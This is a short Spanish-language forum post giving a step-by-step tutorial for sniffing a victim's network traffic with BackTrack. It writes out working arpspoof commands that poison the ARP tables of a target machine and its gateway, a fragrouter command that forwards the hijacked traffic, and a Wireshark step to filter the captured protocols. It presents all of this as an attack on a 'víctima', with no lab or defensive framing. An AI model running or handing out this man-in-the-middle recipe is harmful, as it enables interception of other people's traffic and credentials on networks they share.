Hola soy Rodolfo , y pues soy nuevo en este foro y les traigo un tutorial , de como sniffear con BackTrack

Herramientas:
Arpspoof
Fragrouter
Wireshark

Bueno abirmos una consola y usaremos arpspoof para suplantar las tablas arp en la victima, la sintaxis es :
Code:
arpspoof -i interfaz -t ipdeltarget hostdelgateway
y tecleamos:
Code:
arpspoof -i wlan0 -t 192.168.1.5 192.168.1.254
Ahora volvemos a usar arpspoof pero hacemos los contrarios , ejemplo:
Code:
arpspoof -i wlan0 -t 192.168.1.254 192.168.1.5
y ahora usaremos fragrouter para aceptar el ip forwarding
Code:
fragrouter -i wlan0 -B1
Y por ultimo paso solo nos queda abrir el wireshark y en el filtro poner el protocolo deseado.

El filtro se puede mejorar.